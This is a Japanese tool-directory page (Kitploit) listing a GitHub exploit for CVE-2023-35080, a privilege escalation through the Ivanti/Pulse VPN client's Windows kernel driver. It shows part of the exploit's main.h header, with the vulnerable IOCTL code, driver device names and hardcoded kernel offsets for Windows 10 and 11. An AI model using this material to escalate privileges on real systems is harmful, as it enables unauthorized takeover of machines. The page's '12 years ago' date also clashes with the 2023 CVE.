Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation | Kitploit
ツール/GitHubGitHub/hophouse/ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation
特権昇格エクスプロイトフレームワーク脆弱性分析エクスプロイトバイナリエクスプロイト
GitHubhophouse/ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation

Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
12年前未レビュー

CVE-2023-35080 を利用した Ivanti/Pulse VPN クライアントのエクスプロイトによる特権昇格

Windows の Ivanti/Pulse VPN クライアントカーネルドライバーにおける書き込みプリミティブを利用する CVE-2023-35080 の悪用に関連するコードです。この書き込みプリミティブにより特権昇格が引き起こされます。

このエクスプロイトは、以下の記事で公開されている技術的詳細を参考に作成されました : https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation。

一部の詳細は main.h ファイルにハードコードされています :

root@kitploit:~
#pragma once

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>


#define VULN_IOCTL  0x80002018

////////

/*
 * jnprTdi_9115_15819 W10
 */

 // #define DEVICE_NAME_W L"jnprTdi_9115_15819"

 // // KxWaitForSpinLockAndAcquire
 // #define SPIN_OFFSET 0x300ea0

 // // KxTryToAcquireSpinLock
 // #define TRY_SPIN_OFFSET 0x361758

 // // void write_char(byte param_1,byte **param_2,int *param_3)
 // #define WRITE_CHAR_OFFSET 0x3d5878

 ////////

 /*
  * jnprTdi_9117_18209 W11
  */

#define DEVICE_NAME_W L"jnprTdi_9117_18209"

  // KxWaitForSpinLockAndAcquire 
#define SPIN_OFFSET 0x300e9e

// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757

// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8

////////

[...]
ツールをダウンロード